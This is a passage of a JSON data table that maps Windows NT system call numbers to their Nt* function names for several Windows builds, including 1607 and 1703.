\"NtResumeProcess\", \"357\": \"NtRevertContainerImpersonation\", \"358\": \"NtRollbackComplete\", \"359\": \"NtRollbackEnlistment\", \"360\": \"NtRollbackTransaction\", \"361\": \"NtRollforwardTransactionManager\", \"362\": \"NtSaveKey\", \"363\": \"NtSaveKeyEx\", \"364\": \"NtSaveMergedKeys\", \"365\": \"NtSecureConnectPort\", \"366\": \"NtSerializeBoot\", \"367\": \"NtSetBootEntryOrder\", \"368\": \"NtSetBootOptions\", \"369\": \"NtSetCachedSigningLevel\", \"370\": \"NtSetContextThread\", \"371\": \"NtSetDebugFilterState\", \"372\": \"NtSetDefaultHardErrorPort\", \"373\": \"NtSetDefaultLocale\", \"374\": \"NtSetDefaultUILanguage\", \"375\": \"NtSetDriverEntryOrder\", \"376\": \"NtSetEaFile\", \"377\": \"NtSetHighEventPair\", \"378\": \"NtSetHighWaitLowEventPair\", \"379\": \"NtSetIRTimer\", \"380\": \"NtSetInformationDebugObject\", \"381\": \"NtSetInformationEnlistment\", \"382\": \"NtSetInformationJobObject\", \"383\": \"NtSetInformationKey\", \"384\": \"NtSetInformationResourceManager\", \"385\": \"NtSetInformationSymbolicLink\", \"386\": \"NtSetInformationToken\", \"387\": \"NtSetInformationTransaction\", \"388\": \"NtSetInformationTransactionManager\", \"389\": \"NtSetInformationVirtualMemory\", \"390\": \"NtSetInformationWorkerFactory\", \"391\": \"NtSetIntervalProfile\", \"392\": \"NtSetIoCompletion\", \"393\": \"NtSetIoCompletionEx\", \"394\": \"NtSetLdtEntries\", \"395\": \"NtSetLowEventPair\", \"396\": \"NtSetLowWaitHighEventPair\", \"397\": \"NtSetQuotaInformationFile\", \"398\": \"NtSetSecurityObject\", \"399\": \"NtSetSystemEnvironmentValue\", \"400\": \"NtSetSystemEnvironmentValueEx\", \"401\": \"NtSetSystemInformation\", \"402\": \"NtSetSystemPowerState\", \"403\": \"NtSetSystemTime\", \"404\": \"NtSetThreadExecutionState\", \"405\": \"NtSetTimer2\", \"406\": \"NtSetTimerEx\", \"407\": \"NtSetTimerResolution\", \"408\": \"NtSetUuidSeed\", \"409\": \"NtSetVolumeInformationFile\", \"410\": \"NtSetWnfProcessNotificationEvent\", \"411\": \"NtShutdownSystem\", \"412\": \"NtShutdownWorkerFactory\", \"413\": \"NtSignalAndWaitForSingleObject\", \"414\": \"NtSinglePhaseReject\", \"415\": \"NtStartProfile\", \"416\": \"NtStopProfile\", \"417\": \"NtSubscribeWnfStateChange\", \"418\": \"NtSuspendProcess\", \"419\": \"NtSuspendThread\", \"420\": \"NtSystemDebugControl\", \"421\": \"NtTerminateJobObject\", \"422\": \"NtTestAlert\", \"423\": \"NtThawRegistry\", \"424\": \"NtThawTransactions\", \"425\": \"NtTraceControl\", \"426\": \"NtTranslateFilePath\", \"427\": \"NtUmsThreadYield\", \"428\": \"NtUnloadDriver\", \"429\": \"NtUnloadKey\", \"430\": \"NtUnloadKey2\", \"431\": \"NtUnloadKeyEx\", \"432\": \"NtUnlockFile\", \"433\": \"NtUnlockVirtualMemory\", \"434\": \"NtUnmapViewOfSectionEx\", \"435\": \"NtUnsubscribeWnfStateChange\", \"436\": \"NtUpdateWnfStateData\", \"437\": \"NtVdmControl\", \"438\": \"NtWaitForAlertByThreadId\", \"439\": \"NtWaitForDebugEvent\", \"440\": \"NtWaitForKeyedEvent\", \"441\": \"NtWaitForWorkViaWorkerFactory\", \"442\": \"NtWaitHighEventPair\", \"443\": \"NtWaitLowEventPair\"}, \"1607\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientContainerOfPort\", \"130\": \"NtAlpcImpersonateClientOfPort\", \"131\": \"NtAlpcOpenSenderProcess\", \"132\": \"NtAlpcOpenSenderThread\", \"133\": \"NtAlpcQueryInformation\", \"134\": \"NtAlpcQueryInformationMessage\", \"135\": \"NtAlpcRevokeSecurityContext\", \"136\": \"NtAlpcSendWaitReceivePort\", \"137\": \"NtAlpcSetInformation\", \"138\": \"NtAreMappedFilesTheSame\", \"139\": \"NtAssignProcessToJobObject\", \"140\": \"NtAssociateWaitCompletionPacket\", \"141\": \"NtCancelIoFileEx\", \"142\": \"NtCancelSynchronousIoFile\", \"143\": \"NtCancelTimer2\", \"144\": \"NtCancelWaitCompletionPacket\", \"145\": \"NtCommitComplete\", \"146\": \"NtCommitEnlistment\", \"147\": \"NtCommitRegistryTransaction\", \"148\": \"NtCommitTransaction\", \"149\": \"NtCompactKeys\", \"150\": \"NtCompareObjects\", \"151\": \"NtCompareTokens\", \"152\": \"NtCompleteConnectPort\", \"153\": \"NtCompressKey\", \"154\": \"NtConnectPort\", \"155\": \"NtCreateDebugObject\", \"156\": \"NtCreateDirectoryObject\", \"157\": \"NtCreateDirectoryObjectEx\", \"158\": \"NtCreateEnclave\", \"159\": \"NtCreateEnlistment\", \"160\": \"NtCreateEventPair\", \"161\": \"NtCreateIRTimer\", \"162\": \"NtCreateIoCompletion\", \"163\": \"NtCreateJobObject\", \"164\": \"NtCreateJobSet\", \"165\": \"NtCreateKeyTransacted\", \"166\": \"NtCreateKeyedEvent\", \"167\": \"NtCreateLowBoxToken\", \"168\": \"NtCreateMailslotFile\", \"169\": \"NtCreateMutant\", \"170\": \"NtCreateNamedPipeFile\", \"171\": \"NtCreatePagingFile\", \"172\": \"NtCreatePartition\", \"173\": \"NtCreatePort\", \"174\": \"NtCreatePrivateNamespace\", \"175\": \"NtCreateProcess\", \"176\": \"NtCreateProfile\", \"177\": \"NtCreateProfileEx\", \"178\": \"NtCreateRegistryTransaction\", \"179\": \"NtCreateResourceManager\", \"180\": \"NtCreateSemaphore\", \"181\": \"NtCreateSymbolicLinkObject\", \"182\": \"NtCreateThreadEx\", \"183\": \"NtCreateTimer\", \"184\": \"NtCreateTimer2\", \"185\": \"NtCreateToken\", \"186\": \"NtCreateTokenEx\", \"187\": \"NtCreateTransaction\", \"188\": \"NtCreateTransactionManager\", \"189\": \"NtCreateUserProcess\", \"190\": \"NtCreateWaitCompletionPacket\", \"191\": \"NtCreateWaitablePort\", \"192\": \"NtCreateWnfStateName\", \"193\": \"NtCreateWorkerFactory\", \"194\": \"NtDebugActiveProcess\", \"195\": \"NtDebugContinue\", \"196\": \"NtDeleteAtom\", \"197\": \"NtDeleteBootEntry\", \"198\": \"NtDeleteDriverEntry\", \"199\": \"NtDeleteFile\", \"200\": \"NtDeleteKey\", \"201\": \"NtDeleteObjectAuditAlarm\", \"202\": \"NtDeletePrivateNamespace\", \"203\": \"NtDeleteValueKey\", \"204\": \"NtDeleteWnfStateData\", \"205\": \"NtDeleteWnfStateName\", \"206\": \"NtDisableLastKnownGood\", \"207\": \"NtDisplayString\", \"208\": \"NtDrawText\", \"209\": \"NtEnableLastKnownGood\", \"210\": \"NtEnumerateBootEntries\", \"211\": \"NtEnumerateDriverEntries\", \"212\": \"NtEnumerateSystemEnvironmentValuesEx\", \"213\": \"NtEnumerateTransactionObject\", \"214\": \"NtExtendSection\", \"215\": \"NtFilterBootOption\", \"216\": \"NtFilterToken\", \"217\": \"NtFilterTokenEx\", \"218\": \"NtFlushBuffersFileEx\", \"219\": \"NtFlushInstallUILanguage\", \"220\": \"NtFlushInstructionCache\", \"221\": \"NtFlushKey\", \"222\": \"NtFlushProcessWriteBuffers\", \"223\": \"NtFlushVirtualMemory\", \"224\": \"NtFlushWriteBuffer\", \"225\": \"NtFreeUserPhysicalPages\", \"226\": \"NtFreezeRegistry\", \"227\": \"NtFreezeTransactions\", \"228\": \"NtGetCachedSigningLevel\", \"229\": \"NtGetCompleteWnfStateSubscription\", \"230\": \"NtGetContextThread\", \"231\": \"NtGetCurrentProcessorNumber\", \"232\": \"NtGetCurrentProcessorNumberEx\", \"233\": \"NtGetDevicePowerState\", \"234\": \"NtGetMUIRegistryInfo\", \"235\": \"NtGetNextProcess\", \"236\": \"NtGetNextThread\", \"237\": \"NtGetNlsSectionPtr\", \"238\": \"NtGetNotificationResourceManager\", \"239\": \"NtGetWriteWatch\", \"240\": \"NtImpersonateAnonymousToken\", \"241\": \"NtImpersonateThread\", \"242\": \"NtInitializeEnclave\", \"243\": \"NtInitializeNlsFiles\", \"244\": \"NtInitializeRegistry\", \"245\": \"NtInitiatePowerAction\", \"246\": \"NtIsSystemResumeAutomatic\", \"247\": \"NtIsUILanguageComitted\", \"248\": \"NtListenPort\", \"249\": \"NtLoadDriver\", \"250\": \"NtLoadEnclaveData\", \"251\": \"NtLoadKey\", \"252\": \"NtLoadKey2\", \"253\": \"NtLoadKeyEx\", \"254\": \"NtLockFile\", \"255\": \"NtLockProductActivationKeys\", \"256\": \"NtLockRegistryKey\", \"257\": \"NtLockVirtualMemory\", \"258\": \"NtMakePermanentObject\", \"259\": \"NtMakeTemporaryObject\", \"260\": \"NtManagePartition\", \"261\": \"NtMapCMFModule\", \"262\": \"NtMapUserPhysicalPages\", \"263\": \"NtModifyBootEntry\", \"264\": \"NtModifyDriverEntry\", \"265\": \"NtNotifyChangeDirectoryFile\", \"266\": \"NtNotifyChangeKey\", \"267\": \"NtNotifyChangeMultipleKeys\", \"268\": \"NtNotifyChangeSession\", \"269\": \"NtOpenEnlistment\", \"270\": \"NtOpenEventPair\", \"271\": \"NtOpenIoCompletion\", \"272\": \"NtOpenJobObject\", \"273\": \"NtOpenKeyEx\", \"274\": \"NtOpenKeyTransacted\", \"275\": \"NtOpenKeyTransactedEx\", \"276\": \"NtOpenKeyedEvent\", \"277\": \"NtOpenMutant\", \"278\": \"NtOpenObjectAuditAlarm\", \"279\": \"NtOpenPartition\", \"280\": \"NtOpenPrivateNamespace\", \"281\": \"NtOpenProcessToken\", \"282\": \"NtOpenRegistryTransaction\", \"283\": \"NtOpenResourceManager\", \"284\": \"NtOpenSemaphore\", \"285\": \"NtOpenSession\", \"286\": \"NtOpenSymbolicLinkObject\", \"287\": \"NtOpenThread\", \"288\": \"NtOpenTimer\", \"289\": \"NtOpenTransaction\", \"290\": \"NtOpenTransactionManager\", \"291\": \"NtPlugPlayControl\", \"292\": \"NtPrePrepareComplete\", \"293\": \"NtPrePrepareEnlistment\", \"294\": \"NtPrepareComplete\", \"295\": \"NtPrepareEnlistment\", \"296\": \"NtPrivilegeCheck\", \"297\": \"NtPrivilegeObjectAuditAlarm\", \"298\": \"NtPrivilegedServiceAuditAlarm\", \"299\": \"NtPropagationComplete\", \"300\": \"NtPropagationFailed\", \"301\": \"NtPulseEvent\", \"302\": \"NtQueryBootEntryOrder\", \"303\": \"NtQueryBootOptions\", \"304\": \"NtQueryDebugFilterState\", \"305\": \"NtQueryDirectoryObject\", \"306\": \"NtQueryDriverEntryOrder\", \"307\": \"NtQueryEaFile\", \"308\": \"NtQueryFullAttributesFile\", \"309\": \"NtQueryInformationAtom\", \"310\": \"NtQueryInformationEnlistment\", \"311\": \"NtQueryInformationJobObject\", \"312\": \"NtQueryInformationPort\", \"313\": \"NtQueryInformationResourceManager\", \"314\": \"NtQueryInformationTransaction\", \"315\": \"NtQueryInformationTransactionManager\", \"316\": \"NtQueryInformationWorkerFactory\", \"317\": \"NtQueryInstallUILanguage\", \"318\": \"NtQueryIntervalProfile\", \"319\": \"NtQueryIoCompletion\", \"320\": \"NtQueryLicenseValue\", \"321\": \"NtQueryMultipleValueKey\", \"322\": \"NtQueryMutant\", \"323\": \"NtQueryOpenSubKeys\", \"324\": \"NtQueryOpenSubKeysEx\", \"325\": \"NtQueryPortInformationProcess\", \"326\": \"NtQueryQuotaInformationFile\", \"327\": \"NtQuerySecurityAttributesToken\", \"328\": \"NtQuerySecurityObject\", \"329\": \"NtQuerySecurityPolicy\", \"330\": \"NtQuerySemaphore\", \"331\": \"NtQuerySymbolicLinkObject\", \"332\": \"NtQuerySystemEnvironmentValue\", \"333\": \"NtQuerySystemEnvironmentValueEx\", \"334\": \"NtQuerySystemInformationEx\", \"335\": \"NtQueryTimerResolution\", \"336\": \"NtQueryWnfStateData\", \"337\": \"NtQueryWnfStateNameInformation\", \"338\": \"NtQueueApcThreadEx\", \"339\": \"NtRaiseException\", \"340\": \"NtRaiseHardError\", \"341\": \"NtReadOnlyEnlistment\", \"342\": \"NtRecoverEnlistment\", \"343\": \"NtRecoverResourceManager\", \"344\": \"NtRecoverTransactionManager\", \"345\": \"NtRegisterProtocolAddressInformation\", \"346\": \"NtRegisterThreadTerminatePort\", \"347\": \"NtReleaseKeyedEvent\", \"348\": \"NtReleaseWorkerFactoryWorker\", \"349\": \"NtRemoveIoCompletionEx\", \"350\": \"NtRemoveProcessDebug\", \"351\": \"NtRenameKey\", \"352\": \"NtRenameTransactionManager\", \"353\": \"NtReplaceKey\", \"354\": \"NtReplacePartitionUnit\", \"355\": \"NtReplyWaitReplyPort\", \"356\": \"NtRequestPort\", \"357\": \"NtResetEvent\", \"358\": \"NtResetWriteWatch\", \"359\": \"NtRestoreKey\", \"360\": \"NtResumeProcess\", \"361\": \"NtRevertContainerImpersonation\", \"362\": \"NtRollbackComplete\", \"363\": \"NtRollbackEnlistment\", \"364\": \"NtRollbackRegistryTransaction\", \"365\": \"NtRollbackTransaction\", \"366\": \"NtRollforwardTransactionManager\", \"367\": \"NtSaveKey\", \"368\": \"NtSaveKeyEx\", \"369\": \"NtSaveMergedKeys\", \"370\": \"NtSecureConnectPort\", \"371\": \"NtSerializeBoot\", \"372\": \"NtSetBootEntryOrder\", \"373\": \"NtSetBootOptions\", \"374\": \"NtSetCachedSigningLevel\", \"375\": \"NtSetCachedSigningLevel2\", \"376\": \"NtSetContextThread\", \"377\": \"NtSetDebugFilterState\", \"378\": \"NtSetDefaultHardErrorPort\", \"379\": \"NtSetDefaultLocale\", \"380\": \"NtSetDefaultUILanguage\", \"381\": \"NtSetDriverEntryOrder\", \"382\": \"NtSetEaFile\", \"383\": \"NtSetHighEventPair\", \"384\": \"NtSetHighWaitLowEventPair\", \"385\": \"NtSetIRTimer\", \"386\": \"NtSetInformationDebugObject\", \"387\": \"NtSetInformationEnlistment\", \"388\": \"NtSetInformationJobObject\", \"389\": \"NtSetInformationKey\", \"390\": \"NtSetInformationResourceManager\", \"391\": \"NtSetInformationSymbolicLink\", \"392\": \"NtSetInformationToken\", \"393\": \"NtSetInformationTransaction\", \"394\": \"NtSetInformationTransactionManager\", \"395\": \"NtSetInformationVirtualMemory\", \"396\": \"NtSetInformationWorkerFactory\", \"397\": \"NtSetIntervalProfile\", \"398\": \"NtSetIoCompletion\", \"399\": \"NtSetIoCompletionEx\", \"400\": \"NtSetLdtEntries\", \"401\": \"NtSetLowEventPair\", \"402\": \"NtSetLowWaitHighEventPair\", \"403\": \"NtSetQuotaInformationFile\", \"404\": \"NtSetSecurityObject\", \"405\": \"NtSetSystemEnvironmentValue\", \"406\": \"NtSetSystemEnvironmentValueEx\", \"407\": \"NtSetSystemInformation\", \"408\": \"NtSetSystemPowerState\", \"409\": \"NtSetSystemTime\", \"410\": \"NtSetThreadExecutionState\", \"411\": \"NtSetTimer2\", \"412\": \"NtSetTimerEx\", \"413\": \"NtSetTimerResolution\", \"414\": \"NtSetUuidSeed\", \"415\": \"NtSetVolumeInformationFile\", \"416\": \"NtSetWnfProcessNotificationEvent\", \"417\": \"NtShutdownSystem\", \"418\": \"NtShutdownWorkerFactory\", \"419\": \"NtSignalAndWaitForSingleObject\", \"420\": \"NtSinglePhaseReject\", \"421\": \"NtStartProfile\", \"422\": \"NtStopProfile\", \"423\": \"NtSubscribeWnfStateChange\", \"424\": \"NtSuspendProcess\", \"425\": \"NtSuspendThread\", \"426\": \"NtSystemDebugControl\", \"427\": \"NtTerminateJobObject\", \"428\": \"NtTestAlert\", \"429\": \"NtThawRegistry\", \"430\": \"NtThawTransactions\", \"431\": \"NtTraceControl\", \"432\": \"NtTranslateFilePath\", \"433\": \"NtUmsThreadYield\", \"434\": \"NtUnloadDriver\", \"435\": \"NtUnloadKey\", \"436\": \"NtUnloadKey2\", \"437\": \"NtUnloadKeyEx\", \"438\": \"NtUnlockFile\", \"439\": \"NtUnlockVirtualMemory\", \"440\": \"NtUnmapViewOfSectionEx\", \"441\": \"NtUnsubscribeWnfStateChange\", \"442\": \"NtUpdateWnfStateData\", \"443\": \"NtVdmControl\", \"444\": \"NtWaitForAlertByThreadId\", \"445\": \"NtWaitForDebugEvent\", \"446\": \"NtWaitForKeyedEvent\", \"447\": \"NtWaitForWorkViaWorkerFactory\", \"448\": \"NtWaitHighEventPair\", \"449\": \"NtWaitLowEventPair\"}, \"1703\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAlpcAcceptConnectPort\", \"117\": \"NtAlpcCancelMessage\", \"118\": \"NtAlpcConnectPort\", \"119\": \"NtAlpcConnectPortEx\", \"120\": \"NtAlpcCreatePort\", \"121\": \"NtAlpcCreatePortSection\", \"122\": \"NtAlpcCreateResourceReserve\", \"123\": \"NtAlpcCreateSectionView\", \"124\": \"NtAlpcCreateSecurityContext\", \"125\": \"NtAlpcDeletePortSection\", \"126\": \"NtAlpcDeleteResourceReserve\", \"127\": \"NtAlpcDeleteSectionView\", \"128\": \"NtAlpcDeleteSecurityContext\", \"129\": \"NtAlpcDisconnectPort\", \"130\": \"NtAlpcImpersonateClientContainerOfPort\", \"131\": \"NtAlpcImpersonateClientOfPort\", \"132\": \"NtAlpcOpenSenderProcess\", \"133\": \"NtAlpcOpenSenderThread\", \"134\": \"NtAlpcQueryInformation\", \"135\": \"NtAlpcQueryInformationMessage\", \"136\": \"NtAlpcRevokeSecurityContext\", \"137\": \"NtAlpcSendWaitReceivePort\", \"138\": \"NtAlpcSetInformation\", \"139\": \"NtAreMappedFilesTheSame\", \"140\": \"NtAssignProcessToJobObject\", \"141\": \"NtAssociateWaitCompletionPacket\", \"142\": \"NtCancelIoFileEx\", \"143\": \"NtCancelSynchronousIoFile\", \"144\": \"NtCancelTimer2\", \"145\": \"NtCancelWaitCompletionPacket\", \"146\": \"NtCommitComplete\", \"147\": \"NtCommitEnlistment\", \"148\": \"NtCommitRegistryTransaction\", \"149\": \"NtCommitTransaction\", \"150\": \"NtCompactKeys\", \"151\": \"NtCompareObjects\", \"152\": \"NtCompareSigningLevels\", \"153\": \"NtCompareTokens\", \"154\": \"NtCompleteConnectPort\", \"155\": \"NtCompressKey\", \"156\": \"NtConnectPort\", \"157\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"158\": \"NtCreateDebugObject\", \"159\": \"NtCreateDirectoryObject\", \"160\": \"NtCreateDirectoryObjectEx\", \"161\": \"NtCreateEnclave\", \"162\": \"NtCreateEnlistment\", \"163\": \"NtCreateEventPair\", \"164\": \"NtCreateIRTimer\", \"165\": \"NtCreateIoCompletion\", \"166\": \"NtCreateJobObject\", \"167\": \"NtCreateJobSet\", \"168\": \"NtCreateKeyTransacted\", \"169\": \"NtCreateKeyedEvent\", \"170\": \"NtCreateLowBoxToken\", \"171\": \"NtCreateMailslotFile\", \"172\": \"NtCreateMutant\", \"173\": \"NtCreateNamedPipeFile\", \"174\": \"NtCreatePagingFile\", \"175\": \"NtCreatePartition\", \"176\": \"NtCreatePort\", \"177\": \"NtCreatePrivateNamespace\", \"178\": \"NtCreateProcess\", \"179\": \"NtCreateProfile\", \"180\": \"NtCreateProfileEx\", \"181\": \"NtCreateRegistryTransaction\", \"182\": \"NtCreateResourceManager\", \"183\": \"NtCreateSemaphore\", \"184\": \"NtCreateSymbolicLinkObject\", \"185\": \"NtCreateThreadEx\", \"186\": \"NtCreateTimer\", \"187\": \"NtCreateTimer2\", \"188\": \"NtCreateToken\", \"189\": \"NtCreateTokenEx\", \"190\": \"NtCreateTransaction\", \"191\": \"NtCreateTransactionManager\", \"192\": \"NtCreateUserProcess\", \"193\": \"NtCreateWaitCompletionPacket\", \"194\": \"NtCreateWaitablePort\", \"195\": \"NtCreateWnfStateName\", \"196\": \"NtCreateWorkerFactory\", \"197\": \"NtDebugActiveProcess\", \"198\": \"NtDebugContinue\", \"199\": \"NtDeleteAtom\", \"200\": \"NtDeleteBootEntry\", \"201\": \"NtDeleteDriverEntry\", \"202\": \"NtDeleteFile\", \"203\": \"NtDeleteKey\", \"204\": \"NtDeleteObjectAuditAlarm\", \"205\": \"NtDeletePrivateNamespace\", \"206\": \"NtDeleteValueKey\", \"207\": 